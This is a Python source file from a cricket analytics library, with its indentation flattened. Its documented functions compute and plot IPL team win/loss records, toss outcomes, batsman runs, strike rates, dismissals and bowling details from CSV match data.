def teamBowlersVsBatsmenAllOppnAllMatches(matches,main,plot=True,top=5,runsConceded=10,savePic=False, dir1=".",picFile="pic1.png"):
'''
Compute team bowlers vs batsmen all opposition all matches
Description
This function computes the performance of bowlers of a team against all oppositions in all matches
Usage
teamBowlersVsBatsmenAllOppnAllMatches(matches,main,plot=True,top=5,runsConceded=10)
Arguments
matches
the data frame of all matches between a team and all oppositions, obtained with the call getAllMatchesAllOpposition()
main
The team for which the performance is required
plot
Whether a plot should be displayed or a dataframe is to be returned
top
The top number of bowlers in the result
runsConceded
The minimum number of runs conceded by bowlers
savePic
If savePic = True then the plot is saved
dir1
The directory where the plot is saved
picFile
The name of the savefile
Value
dataframe The dataframe with all performances
Note
Maintainer: Tinniam V Ganesh tvganesh.85@gmail.com
Author(s)
Tinniam V Ganesh
References
http://cricsheet.org/
https://gigadom.wordpress.com/
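Examples
# Illustrative sketch; assumes getAllMatchesAllOpposition() returns the saved matches dataframe
matches = getAllMatchesAllOpposition('India',dir='.',save=False)
teamBowlersVsBatsmenAllOppnAllMatches(matches,'India',plot=True,top=5,runsConceded=10)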
'''
df1=matches.loc[matches.team== main]
df2= df1[['bowler','batsman','runs']]
# Runs conceded by each bowler to each batsman
df3=df2.groupby(['bowler','batsman']).sum().reset_index(inplace=False)
df3.columns = ['bowler','batsman','runsConceded']
# Need to pick the 'top' number of bowlers by runs conceded
df4 = df3.groupby('bowler').sum().reset_index(inplace=False).sort_values('runsConceded',ascending=False)
df4.columns = ['bowler','totalRunsConceded']
df5 = df4.head(top)
df6= pd.merge(df5,df3,on='bowler')
df7 = df6[['bowler','batsman','runsConceded']]
# Keep only pairs where runsConceded exceeds the threshold, to reduce clutter
df8 = df7[df7['runsConceded'] >runsConceded]
df9=df8.groupby(['bowler','batsman'])['runsConceded'].sum().unstack().fillna(0)
# Note: Can also use the below code -*************
#df9=df8.pivot(columns='bowler',index='batsman').fillna(0)
if plot == True:
ax=df9.plot(kind='bar',stacked=False,legend=False,fontsize=8)
plt.legend(loc='center left', bbox_to_anchor=(1.0, 0.5),fontsize=8)
plt.title('Performance of ' + main + ' bowlers vs batsmen')
plt.xlabel('Bowler')
plt.ylabel('Total runs')
if(savePic):
plt.savefig(os.path.join(dir1,picFile),bbox_inches='tight')
else:
plt.show()
plt.gcf().clear()
else:
return(df7)
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 1 Feb 2019
# Function: plotWinLossByTeamAllOpposition
# This function computes and plots the wins and losses of an IPL team against all other
# IPL teams
#
###########################################################################################
def plotWinLossByTeamAllOpposition(matches, team1, plot='summary',savePic=False, dir1=".",picFile="pic1.png"):
'''
Plot wins for each team
Description
This function computes and plots the number of wins for the team in all its encounters.
The plot includes the number of wins of team1 against each team and the matches with no result
Usage
plotWinLossByTeamAllOpposition(matches, team1, plot='summary')
Arguments
matches
The dataframe with all matches of the team against all oppositions
team1
The team for which the plot is required
plot
Summary or detailed
savePic
If savePic = True then the plot is saved
dir1
The directory where the plot is saved
picFile
The name of the savefile
Value
None
Note
Maintainer: Tinniam V Ganesh tvganesh.85@gmail.com
Author(s)
Tinniam V Ganesh
References
http://cricsheet.org/
https://gigadom.wordpress.com/
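Examples
# Illustrative sketch; assumes getAllMatchesAllOpposition() returns the saved matches dataframe
matches = getAllMatchesAllOpposition('India',dir='.',save=False)
plotWinLossByTeamAllOpposition(matches,'India',plot='summary')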
'''
a=matches[['date','winner']].groupby(['date','winner']).count().reset_index(inplace=False)
# Plot the overall performance as wins and losses
if plot=="summary":
m= a.loc[a.winner==team1]['winner'].count()
n= a.loc[a.winner!=team1]['winner'].count()
df=pd.DataFrame({'outcome':['win','loss'],'number':[m,n]})
sns.barplot(x='outcome',y='number',data=df)
plt.xlabel('Outcome')
plt.ylabel('Number')
plt.title("Wins vs losses(summary) of " + team1 + ' against all Opposition' )
if(savePic):
plt.savefig(os.path.join(dir1,picFile),bbox_inches='tight')
else:
plt.show()
plt.gcf().clear()
elif plot=="detailed" :
#Plot breakup by team
b=a.groupby('winner').count().reset_index(inplace=False)
# If 'winner' is '0' then the match is a tie. Set it to 'Tie'
b.loc[b.winner=='0','winner']='Tie'
b.columns = ['winner','number']
ax=sns.barplot(x='winner',y='number',data=b)
plt.xlabel('Winner')
plt.ylabel('Number')
plt.title("Wins vs losses(detailed) of " + team1 + ' against all Opposition' )
ax.set_xticklabels(ax.get_xticklabels(),rotation=60,fontsize=6)
if(savePic):
plt.savefig(os.path.join(dir1,picFile),bbox_inches='tight')
else:
plt.show()
plt.gcf().clear()
else:
print("Unknown option")
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 1 Feb 2019
# Function: plotWinsByRunOrWicketsAllOpposition
# This function computes and plots the wins and losses of an IPL team against all other
# IPL teams
#
###########################################################################################
def plotWinsByRunOrWicketsAllOpposition(matches,team1,plot=True, savePic=False, dir1=".",picFile="pic1.png"):
'''
Plot whether the wins for the team was by runs or wickets
Description
This function computes and plots the number of wins by runs versus the number of wins
by wickets against all oppositions
Usage
plotWinsByRunOrWicketsAllOpposition(matches,team1)
Arguments
matches
The dataframe with all matches between an IPL team and all IPL teams
team1
The team for which the plot has to be done
savePic
If savePic = True then the plot is saved
dir1
The directory where the plot is saved
picFile
The name of the savefile
Value
None
Note
Maintainer: Tinniam V Ganesh tvganesh.85@gmail.com
Author(s)
Tinniam V Ganesh
References
http://cricsheet.org/
https://gigadom.wordpress.com/
'''
# Get the number of matches won
df= matches.loc[matches.winner == team1]
a=df[['date','winType']].groupby(['date','winType']).count().reset_index(inplace=False)
b=a.groupby('winType').count().reset_index(inplace=False)
b.columns = ['winType','number']
sns.barplot(x='winType',y='number',data=b)
plt.xlabel('Win Type - Runs or wickets')
plt.ylabel('Number')
plt.title("Win type for team -" + team1 + ' against all opposition' )
if(savePic):
plt.savefig(os.path.join(dir1,picFile),bbox_inches='tight')
else:
plt.show()
plt.gcf().clear()
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 1 Feb 2019
# Function: plotWinsbyTossDecisionAllOpposition
# This function computes and plots the win type of an IPL team against all
# IPL teams
#
###########################################################################################
def plotWinsbyTossDecisionAllOpposition(matches,team1,tossDecision='bat',plot="summary", savePic=False, dir1=".",picFile="pic1.png"):
'''
Plot the wins when the team won the toss, by toss decision
Description
This function computes and plots the number of wins and losses in the matches in which
the team won the toss and chose the given toss decision
Usage
plotWinsbyTossDecisionAllOpposition(matches,team1,tossDecision='bat',plot="summary")
Arguments
matches
The dataframe with all matches between an IPL team and all IPL teams
team1
The team for which the plot has to be done
plot
'summary' or 'detailed'
savePic
If savePic = True then the plot is saved
dir1
The directory where the plot is saved
picFile
The name of the savefile
Value
None
Note
Maintainer: Tinniam V Ganesh tvganesh.85@gmail.com
Author(s)
Tinniam V Ganesh
References
http://cricsheet.org/
https://gigadom.wordpress.com/
See Also
teamBowlingScorecardOppnAllMatches
teamBatsmenPartnershipOppnAllMatchesChart
teamBowlingWicketKindOppositionAllMatches
'''
df=matches.loc[(matches.tossDecision==tossDecision) & (matches.tossWinner==team1)]
a=df[['date','winner']].groupby(['date','winner']).count().reset_index(inplace=False)
if plot=="summary":
m= a.loc[a.winner==team1]['winner'].count()
n= a.loc[a.winner!=team1]['winner'].count()
df=pd.DataFrame({'outcome':['win','loss'],'number':[m,n]})
sns.barplot(x='outcome',y='number',data=df)
plt.xlabel('Outcome')
plt.ylabel('Number')
plt.title("Wins vs losses(summary) against all opposition when toss decision was to " + tossDecision + ' for ' + team1 )
if(savePic):
plt.savefig(os.path.join(dir1,picFile),bbox_inches='tight')
else:
plt.show()
plt.gcf().clear()
elif plot=="detailed" :
#Plot breakup by team
b=a.groupby('winner').count().reset_index(inplace=False)
# If 'winner' is '0' then the match is a tie. Set it to 'Tie'
b.loc[b.winner=='0','winner']='Tie'
b.columns = ['winner','number']
ax=sns.barplot(x='winner',y='number',data=b)
plt.xlabel(team1 + ' chose to ' + tossDecision)
plt.ylabel('Number')
plt.title('Wins vs losses(detailed) against all opposition for ' + team1 + ' when toss decision was to ' + tossDecision )
ax.set_xticklabels(ax.get_xticklabels(),rotation=60, fontsize=6)
if(savePic):
plt.savefig(os.path.join(dir1,picFile),bbox_inches='tight')
else:
plt.show()
plt.gcf().clear()
return
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 24 Feb 2019
# Function: getTeamBattingDetails
# This function computes the batting details of a team in all matches against
# all oppositions
#
###########################################################################################
def getTeamBattingDetails(team,dir=".",save=False,odir="."):
'''
Description
This function gets the batting details of a team in all matches against all oppositions. This gets all the details of the batsmen: balls faced, 4s, 6s, strike rate, runs, venue etc. This function is then used for analyses of batsmen. It calls teamBattingScorecardMatch() for each match
Usage
getTeamBattingDetails(team,dir=".",save=False,odir=".")
Arguments
team
The team for which batting details is required
dir
The source directory of the CSV files of the converted matches
save
Whether the data frame needs to be saved as CSV or not. It is recommended to set save=True as the data can be used for a lot of analyses of batsmen
odir
The output directory where the CSV file is saved
Value
battingDetails The dataframe with the batting details
Note
Maintainer: Tinniam V Ganesh tvganesh.85@gmail.com
Author(s)
Tinniam V Ganesh
References
http://cricsheet.org/
https://gigadom.in/
Examples
m=getTeamBattingDetails(team1,dir1,save=True)
'''
# Get all matches played by team
t1 = '*' + team +'*.csv'
path= os.path.join(dir,t1)
files = glob.glob(path)
# Create an empty dataframe
details = pd.DataFrame()
# Loop through all matches played by team
for file in files:
match=pd.read_csv(file)
scorecard,extras=teamBattingScorecardMatch(match,team)
if scorecard.empty:
continue
# Filter out only the rows played by team
match1 = match.loc[match.team==team]
# Check if there were wickets; the 'kind' column will have 'bowled', 'caught' etc.
if len(match1) != 0:
if isinstance(match1.kind.iloc[0],str):
b=match1.loc[match1.kind != '0']
# Get the details of the wicket
wkts= b[['batsman','bowler','fielders','kind','player_out']]
df=pd.merge(scorecard,wkts,how='outer',on='batsman')
# Fill NA as not outs
df =df.fillna('notOut')
# Set other info
if len(b) != 0:
df['date']= b['date'].iloc[0]
df['team2']= b['team2'].iloc[0]
df['winner']= b['winner'].iloc[0]
df['result']= b['result'].iloc[0]
df['venue']= b['venue'].iloc[0]
details= pd.concat([details,df])
details = details.sort_values(['batsman','date'])
if save==True:
fileName = team + "-BattingDetails.csv"
output=os.path.join(odir,fileName)
details.to_csv(output)
return(details)
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 24 Feb 2019
# Function: getBatsmanDetails
# This function gets the batting details of a batsman
#
#
###########################################################################################
def getBatsmanDetails(team, name,dir="."):
'''
Get batting details of batsman from match
Description
This function gets the batting details of a batsman from the saved CSV file of team batting details
Usage
getBatsmanDetails(team,name,dir=".")
Arguments
team
The team of the batsman e.g. India
name
Name of batsman
dir
The directory where the source file exists
Value
None
Note
Maintainer: Tinniam V Ganesh tvganesh.85@gmail.com
Author(s)
Tinniam V Ganesh
References
http://cricsheet.org/
https://gigadom.in/
See Also
batsmanRunsPredict
batsmanMovingAverage
bowlerWicketsVenue
bowlerMeanRunsConceded
Examples
name="SK Raina"
team='Chennai Super Kings'
#df=getBatsmanDetails(team, name,dir=".")
'''
path = dir + '/' + team + "-BattingDetails.csv"
battingDetails= pd.read_csv(path)
batsmanDetails = battingDetails.loc[battingDetails['batsman'].str.contains(name)]
return(batsmanDetails)
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 24 Feb 2019
# Function: batsmanRunsVsDeliveries
# This function plots runs vs deliveries for the batsman
#
###########################################################################################
def batsmanRunsVsDeliveries(df,name= "A Late Cut",plot=True, savePic=False, dir1=".",picFile="pic1.png"):
'''
Runs versus deliveries faced
Description
This function plots the runs scored and the deliveries required. A regression smoothing function is used to fit the points
Usage
batsmanRunsVsDeliveries(df, name= "A Late Cut")
Arguments
df
Data frame
name
Name of batsman
plot
If plot=TRUE then a plot is created otherwise a data frame is returned
savePic
If savePic = True then the plot is saved
dir1
The directory where the plot is saved
picFile
The name of the savefile
Value
None
Note
Maintainer: Tinniam V Ganesh tvganesh.85@gmail.com
Author(s)
Tinniam V Ganesh
References
http://cricsheet.org/
https://gigadom.wordpress.com/
See Also
batsmanFoursSixes
batsmanRunsVsDeliveries
batsmanRunsVsStrikeRate
Examples
name="SK Raina"
team='Chennai Super Kings'
df=getBatsmanDetails(team, name,dir=".")
batsmanRunsVsDeliveries(df, name)
'''
rcParams['figure.figsize'] = 8, 5
plt.scatter(df.balls,df.runs)
sns.lmplot(x='balls',y='runs', data=df)
plt.xlabel("Balls faced",fontsize=8)
plt.ylabel('Runs',fontsize=8)
atitle=name + "- Runs vs balls faced"
plt.title(atitle,fontsize=8)
if(plot==True):
if(savePic):
plt.savefig(os.path.join(dir1,picFile),bbox_inches='tight')
else:
plt.show()
plt.gcf().clear()
return
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 24 Feb 2019
# Function: batsmanFoursSixes
# This function gets the batsman fours and sixes for batsman
#
#
###########################################################################################
def batsmanFoursSixes(df,name= "A Leg Glance", plot=True, savePic=False, dir1=".",picFile="pic1.png"):
'''
Description
This function computes and plots the total runs, fours and sixes of the batsman
Usage
batsmanFoursSixes(df,name= "A Leg Glance")
Arguments
df
Data frame
name
Name of batsman
plot
If plot=TRUE then a plot is created otherwise a data frame is returned
savePic
If savePic = True then the plot is saved
dir1
The directory where the plot is saved
picFile
The name of the savefile
Value
None
Note
Maintainer: Tinniam V Ganesh tvganesh.85@gmail.com
Author(s)
Tinniam V Ganesh
References
http://cricsheet.org/
https://gigadom.wordpress.com/
See Also
batsmanDismissals batsmanRunsVsDeliveries batsmanRunsVsStrikeRate batsmanRunsPredict
Examples
name="SK Raina"
team='Chennai Super Kings'
df=getBatsmanDetails(team, name,dir=".")
batsmanFoursSixes(df,"SK Raina")
'''
# Compute runs from fours and sixes
rcParams['figure.figsize'] = 8, 5
df['RunsFromFours']=df['4s']*4
df['RunsFromSixes']=df['6s']*6
df1 = df[['balls','runs','RunsFromFours','RunsFromSixes']]
# Total runs
sns.scatterplot(x='balls',y='runs',data=df1)
# Fit a linear regression line
balls=df1.balls.values.reshape(-1,1)
linreg = LinearRegression().fit(balls, df1.runs)
x=np.linspace(0,120,10)
#Plot regression line balls vs runs
plt.plot(x, linreg.coef_ * x + linreg.intercept_, color='blue',label="Total runs")
# Runs from fours
sns.scatterplot(x='balls',y='RunsFromFours',data=df1)
#Plot regression line balls vs Runs from fours
linreg = LinearRegression().fit(balls, df1.RunsFromFours)
plt.plot(x, linreg.coef_ * x + linreg.intercept_, color='red',label="Runs from fours")
# Runs from sixes
sns.scatterplot(x='balls',y='RunsFromSixes',data=df1)
#Plot regression line balls vs Runs from sixes
linreg = LinearRegression().fit(balls, df1.RunsFromSixes)
plt.plot(x, linreg.coef_ * x + linreg.intercept_, color='green',label="Runs from sixes")
plt.xlabel("Balls faced",fontsize=8)
plt.ylabel('Runs',fontsize=8)
atitle=name + "- Total runs, fours and sixes"
plt.title(atitle,fontsize=8)
plt.legend(loc="upper left")
if(plot==True):
if(savePic):
plt.savefig(os.path.join(dir1,picFile),bbox_inches='tight')
else:
plt.show()
plt.gcf().clear()
return
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 24 Feb 2019
# Function: batsmanDismissals
# This function plots the batsman dismissals
#
###########################################################################################
def batsmanDismissals(df,name="A Leg Glance",plot=True, savePic=False, dir1=".",picFile="pic1.png"):
'''
Description
This function computes and plots the type of dismissals of the batsman
Usage
batsmanDismissals(df,name="A Leg Glance")
Arguments
df
Data frame
name
Name of batsman
plot
If plot=TRUE then a plot is created otherwise a data frame is returned
savePic
If savePic = True then the plot is saved
dir1
The directory where the plot is saved
picFile
The name of the savefile
Value
None
Note
Maintainer: Tinniam V Ganesh tvganesh.85@gmail.com
Author(s)
Tinniam V Ganesh
References
http://cricsheet.org/
https://gigadom.wordpress.com/
See Also
batsmanFoursSixes
batsmanRunsVsDeliveries
batsmanRunsVsStrikeRate
Examples
name="SK Raina"
team='Chennai Super Kings'
df=getBatsmanDetails(team, name,dir=".")
batsmanDismissals(df,"SK Raina")
'''
# Count dismissals
rcParams['figure.figsize'] = 8, 5
df1 = df[['batsman','kind']]
df2 = df1.groupby('kind').count().reset_index(inplace=False)
df2.columns = ['dismissals','count']
plt.pie(df2['count'], labels=df2['dismissals'],autopct='%.1f%%')
atitle= name + "-Dismissals"
plt.title(atitle,fontsize=8)
if(plot==True):
if(savePic):
plt.savefig(os.path.join(dir1,picFile),bbox_inches='tight')
else:
plt.show()
plt.gcf().clear()
return
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 24 Feb 2019
# Function: batsmanRunsVsStrikeRate
# This function plots the runs vs strike rate
#
#
###########################################################################################
def batsmanRunsVsStrikeRate (df,name= "A Late Cut", plot=True, savePic=False, dir1=".",picFile="pic1.png"):
'''
Description
This function plots the strike rate versus the runs scored by the batsman. A second order regression line is fitted over the points
Usage
batsmanRunsVsStrikeRate(df, name= "A Late Cut")
Arguments
df
Data frame
name
Name of batsman
plot
If plot=TRUE then a plot is created otherwise a data frame is returned
savePic
If savePic = True then the plot is saved
dir1
The directory where the plot is saved
picFile
The name of the savefile
Value
None
Note
Maintainer: Tinniam V Ganesh tvganesh.85@gmail.com
Author(s)
Tinniam V Ganesh
References
http://cricsheet.org/
https://gigadom.wordpress.com/
https://github.com/tvganesh/yorkrData
See Also
batsmanDismissals
batsmanRunsVsDeliveries
batsmanRunsVsStrikeRate
teamBatsmenPartnershipAllOppnAllMatches
Examples
name="SK Raina"
team='Chennai Super Kings'
df=getBatsmanDetails(team, name,dir=".")
batsmanRunsVsStrikeRate(df,"SK Raina")
'''
rcParams['figure.figsize'] = 8, 5
plt.scatter(df.runs,df.SR)
sns.lmplot(x='runs',y='SR', data=df,order=2)
plt.xlabel("Runs",fontsize=8)
plt.ylabel('Strike Rate',fontsize=8)
atitle=name + "- Runs vs Strike rate"
plt.title(atitle,fontsize=8)
if(plot==True):
if(savePic):
plt.savefig(os.path.join(dir1,picFile),bbox_inches='tight')
else:
plt.show()
plt.gcf().clear()
return
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 24 Feb 2019
# Function: movingaverage
# This computes the moving average
#
#
###########################################################################################
def movingaverage(interval, window_size):
window= np.ones(int(window_size))/float(window_size)
return np.convolve(interval, window, 'same')
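# Example (illustrative): movingaverage([1,2,3,4,5], 3) returns
# array([1., 2., 3., 4., 3.]). The 'same' mode keeps the output the same
# length as the input, so the end points are only partially averaged.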
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 24 Feb 2019
# Function: batsmanMovingAverage
# This function plots the moving average of runs
#
#
###########################################################################################
def batsmanMovingAverage(df, name, plot=True, savePic=False, dir1=".",picFile="pic1.png"):
'''
Description
This function plots the runs scored by the batsman over the career as a time series. A moving average (window of 10 innings) smooths the runs scored by the batsman
Usage
batsmanMovingAverage(df, name= "A Leg Glance")
Arguments
df
Data frame
name
Name of batsman
plot
If plot=TRUE then a plot is created otherwise a data frame is returned
savePic
If savePic = True then the plot is saved
dir1
The directory where the plot is saved
picFile
The name of the savefile
Value
None
Note
Maintainer: Tinniam V Ganesh tvganesh.85@gmail.com
Author(s)
Tinniam V Ganesh
References
http://cricsheet.org/
https://gigadom.wordpress.com/
See Also
batsmanDismissals
batsmanRunsVsDeliveries
batsmanRunsVsStrikeRate
teamBatsmenPartnershipAllOppnAllMatches
Examples
name="SK Raina"
team='Chennai Super Kings'
df=getBatsmanDetails(team, name,dir=".")
batsmanMovingAverage(df,"SK Raina")
'''
rcParams['figure.figsize'] = 8, 5
y_av = movingaverage(df.runs, 10)
date= pd.to_datetime(df['date'])
plt.plot(date, y_av,"b")
plt.xlabel('Date',fontsize=8)
plt.ylabel('Runs',fontsize=8)
plt.xticks(rotation=90)
atitle = name + "-Moving average of runs"
plt.title(atitle,fontsize=8)
if(plot==True):
if(savePic):
plt.savefig(os.path.join(dir1,picFile),bbox_inches='tight')
else:
plt.show()
plt.gcf().clear()
return
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 24 Feb 2019
# Function: batsmanCumulativeAverageRuns
# This function plots the cumulative average runs
#
#
###########################################################################################
def batsmanCumulativeAverageRuns(df,name="A Leg Glance",plot=True, savePic=False, dir1=".",picFile="pic1.png"):
'''
Batsman's cumulative average runs
Description
This function computes and plots the cumulative average runs of a batsman
Usage
batsmanCumulativeAverageRuns(df,name= "A Leg Glance")
Arguments
df
Data frame
name
Name of batsman
plot
If plot=TRUE then a plot is created otherwise a data frame is returned
savePic
If savePic = True then the plot is saved
dir1
The directory where the plot is saved
picFile
The name of the savefile
Value
None
Note
Maintainer: Tinniam V Ganesh tvganesh.85@gmail.com
Author(s)
Tinniam V Ganesh
References
http://cricsheet.org/
https://gigadom.wordpress.com/
See Also
batsmanCumulativeStrikeRate bowlerCumulativeAvgEconRate bowlerCumulativeAvgWickets batsmanRunsVsStrikeRate batsmanRunsPredict
Examples
name="SK Raina"
team='Chennai Super Kings'
df=getBatsmanDetails(team, name,dir=".")
batsmanCumulativeAverageRuns(df,"SK Raina")
'''
rcParams['figure.figsize'] = 8, 5
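# Cumulative average = running sum of runs divided by the innings number (1..n)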
cumAvgRuns = df['runs'].cumsum()/pd.Series(np.arange(1, len( df['runs'])+1), df['runs'].index)
plt.plot(cumAvgRuns)
plt.xlabel('No of matches',fontsize=8)
plt.ylabel('Cumulative Average Runs',fontsize=8)
plt.xticks(rotation=90)
atitle = name + "-Cumulative Average Runs vs matches"
plt.title(atitle,fontsize=8)
if(plot==True):
if(savePic):
plt.savefig(os.path.join(dir1,picFile),bbox_inches='tight')
else:
plt.show()
plt.gcf().clear()
return
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 24 Feb 2019
# Function: batsmanCumulativeStrikeRate
# This function plots the cumulative average Strike rate
#
#
###########################################################################################
def batsmanCumulativeStrikeRate(df,name="A Leg Glance",plot=True, savePic=False, dir1=".",picFile="pic1.png"):
'''
Description
This function computes and plots the cumulative average strike rate of a batsman
Usage
batsmanCumulativeStrikeRate(df,name= "A Leg Glance")
Arguments
df
Data frame
name
Name of batsman
plot
If plot=TRUE then a plot is created otherwise a data frame is returned
savePic
If savePic = True then the plot is saved
dir1
The directory where the plot is saved
picFile
The name of the savefile
Value
None
Note
Maintainer: Tinniam V Ganesh tvganesh.85@gmail.com
Author(s)
Tinniam V Ganesh
References
http://cricsheet.org/
https://gigadom.wordpress.com/
https://github.com/tvganesh/yorkrData
See Also
batsmanCumulativeAverageRuns bowlerCumulativeAvgEconRate bowlerCumulativeAvgWickets batsmanRunsVsStrikeRate batsmanRunsPredict
Examples
name="SK Raina"
team='Chennai Super Kings'
df=getBatsmanDetails(team, name,dir=".")
batsmanCumulativeStrikeRate(df,name)
'''
rcParams['figure.figsize'] = 8, 5
cumAvgRuns = df['SR'].cumsum()/pd.Series(np.arange(1, len( df['SR'])+1), df['SR'].index)
plt.plot(cumAvgRuns)
plt.xlabel('No of matches',fontsize=8)
plt.ylabel('Cumulative Average Strike Rate',fontsize=8)
plt.xticks(rotation=70)
atitle = name + "-Cumulative Average Strike Rate vs matches"
plt.title(atitle,fontsize=8)
if(plot==True):
if(savePic):
plt.savefig(os.path.join(dir1,picFile),bbox_inches='tight')
else:
plt.show()
plt.gcf().clear()
return
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 24 Feb 2019
# Function: batsmanRunsAgainstOpposition
# This function plots the batsman's runs against opposition
#
#
###########################################################################################
def batsmanRunsAgainstOpposition(df,name= "A Leg Glance",plot=True, savePic=False, dir1=".",picFile="pic1.png"):
'''
Description
This function computes and plots the mean runs scored by the batsman against different oppositions
Usage
batsmanRunsAgainstOpposition(df, name= "A Leg Glance")
Arguments
df
Data frame
name
Name of batsman
plot
If plot=TRUE then a plot is created otherwise a data frame is returned
savePic
If savePic = True then the plot is saved
dir1
The directory where the plot is saved
picFile
The name of the savefile
Value
None
Note
Maintainer: Tinniam V Ganesh tvganesh.85@gmail.com
Author(s)
Tinniam V Ganesh
References
http://cricsheet.org/
https://gigadom.wordpress.com/
https://github.com/tvganesh/yorkrData
See Also
batsmanFoursSixes
batsmanRunsVsDeliveries
batsmanRunsVsStrikeRate
teamBatsmenPartnershipAllOppnAllMatches
Examples
name="SK Raina"
team='Chennai Super Kings'
df=getBatsmanDetails(team, name,dir=".")
batsmanRunsAgainstOpposition(df,name)
'''
rcParams['figure.figsize'] = 8, 5
df1 = df[['batsman', 'runs','team2']]
df2=df1.groupby('team2').agg(['sum','mean','count'])
df2.columns= ['_'.join(col).strip() for col in df2.columns.values]
# Reset index
df3=df2.reset_index(inplace=False)
ax=sns.barplot(x='team2', y="runs_mean", data=df3)
plt.xticks(rotation="vertical",fontsize=8)
plt.xlabel('Opposition',fontsize=8)
plt.ylabel('Mean Runs',fontsize=8)
atitle=name + "-Mean Runs against opposition"
plt.title(atitle,fontsize=8)
if(plot==True):
if(savePic):
plt.savefig(os.path.join(dir1,picFile),bbox_inches='tight')
else:
plt.show()
plt.gcf().clear()
return
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 24 Feb 2019
# Function: batsmanRunsVenue
# This function plots the batsman's runs at venues
#
#
###########################################################################################
def batsmanRunsVenue(df,name= "A Leg Glance",plot=True, savePic=False, dir1=".",picFile="pic1.png"):
'''
Description
This function computes and plots the mean runs scored by the batsman at different venues of the world
Usage
batsmanRunsVenue(df, name= "A Leg Glance")
Arguments
df
Data frame
name
Name of batsman
plot
If plot=TRUE then a plot is created otherwise a data frame is returned
savePic
If savePic = True then the plot is saved
dir1
The directory where the plot is saved
picFile
The name of the savefile
Value
None
Note
Maintainer: Tinniam V Ganesh tvganesh.85@gmail.com
Author(s)
Tinniam V Ganesh
References
http://cricsheet.org/
https://gigadom.wordpress.com/
https://github.com/tvganesh/yorkrData
See Also
batsmanFoursSixes
batsmanRunsVsDeliveries
batsmanRunsVsStrikeRate
teamBatsmenPartnershipAllOppnAllMatches
batsmanRunsAgainstOpposition
Examples
name="SK Raina"
team='Chennai Super Kings'
df=getBatsmanDetails(team, name,dir=".")
#batsmanRunsVenue(df,name)
'''
rcParams['figure.figsize'] = 8, 5
df1 = df[['batsman', 'runs','venue']]
df2=df1.groupby('venue').agg(['sum','mean','count'])
df2.columns= ['_'.join(col).strip() for col in df2.columns.values]
# Reset index
df3=df2.reset_index(inplace=False)
ax=sns.barplot(x='venue', y="runs_mean", data=df3)
plt.xticks(rotation="vertical",fontsize=8)
plt.xlabel('Venue',fontsize=8)
plt.ylabel('Mean Runs',fontsize=8)
atitle=name + "-Mean Runs at venues"
plt.title(atitle,fontsize=8)
if(plot==True):
if(savePic):
plt.savefig(os.path.join(dir1,picFile),bbox_inches='tight')
else:
plt.show()
plt.gcf().clear()
return
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 24 Feb 2019
# Function: teamBowlingPerDetails
# This function gets the bowling performances
#
#
###########################################################################################
def teamBowlingPerDetails(team):
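'''
Description
This is a helper function which computes the overs bowled, runs conceded, maidens,
wickets and economy rate for each bowler from the deliveries of a team and returns
the merged dataframe. It is used by getTeamBowlingDetails()
'''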
# Compute overs bowled
a1= getOvers(team).reset_index(inplace=False)
# Compute runs conceded
b1= getRunsConceded(team).reset_index(inplace=False)
# Compute maidens
c1= getMaidens(team).reset_index(inplace=False)
# Compute wickets
d1= getWickets(team).reset_index(inplace=False)
e1=pd.merge(a1, b1, how='outer', on='bowler')
f1= pd.merge(e1,c1,how='outer', on='bowler')
g1= pd.merge(f1,d1,how='outer', on='bowler')
g1 = g1.fillna(0)
# Compute economy rate
g1['econrate'] = g1['runs']/g1['overs']
g1.columns=['bowler','overs','runs','maidens','wicket','econrate']
g1.maidens = g1.maidens.astype(int)
g1.wicket = g1.wicket.astype(int)
return(g1)
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 24 Feb 2019
# Function: getTeamBowlingDetails
# This function gets the team bowling details
#
#
###########################################################################################
def getTeamBowlingDetails(team,dir=".",save=False,odir="."):
'''
Description
This function gets the bowling details of a team in all matches against all oppositions. This gets all the details of the bowlers, e.g. deliveries, maidens, runs, wickets, venue, date, winner etc.
Usage
getTeamBowlingDetails(team,dir=".",save=False,odir=".")
Arguments
team
The team for which detailed bowling info is required
dir
The source directory of the CSV files of the converted matches
save
Whether the data frame needs to be saved as CSV or not. It is recommended to set save=True as the data can be used for a lot of analyses of bowlers
odir
The output directory where the CSV file is saved
Value
bowlingDetails The dataframe with the bowling details
Note
Maintainer: Tinniam V Ganesh tvganesh.85@gmail.com
Author(s)
Tinniam V Ganesh
References
http://cricsheet.org/
https://gigadom.wordpress.com/
https://github.com/tvganesh/yorkrData
See Also
getBatsmanDetails
getBowlerWicketDetails
batsmanDismissals
getTeamBattingDetails
Examples
dir1= "C:\\software\\cricket-package\\yorkpyIPLData\\data"
team1='Delhi Daredevils'
m=getTeamBowlingDetails(team1,dir1,save=True)
'''
# Get all matches played by team
t1 = '*' + team +'*.csv'
path= os.path.join(dir,t1)
files = glob.glob(path)
# Create an empty dataframe
details = pd.DataFrame()
# Loop through all matches played by team
for file in files:
match=pd.read_csv(file)
if(match.size != 0):
team1=match.loc[match.team != team]
else:
continue
if len(team1) !=0:
scorecard=teamBowlingPerDetails(team1)
scorecard['date']= match['date'].iloc[0]
scorecard['team2']= match['team2'].iloc[0]
scorecard['winner']= match['winner'].iloc[0]
scorecard['result']= match['result'].iloc[0]
scorecard['venue']= match['venue'].iloc[0]
details= pd.concat([details,scorecard])
details = details.sort_values(['bowler','date'])
else:
pass # The team did not bowl
if save==True:
fileName = "./" + team + "-BowlingDetails.csv"
output=os.path.join(odir,fileName)
details.to_csv(output,index=False)
return(details)
##########################################################################################
# Designed and developed by Tinniam V Ganesh
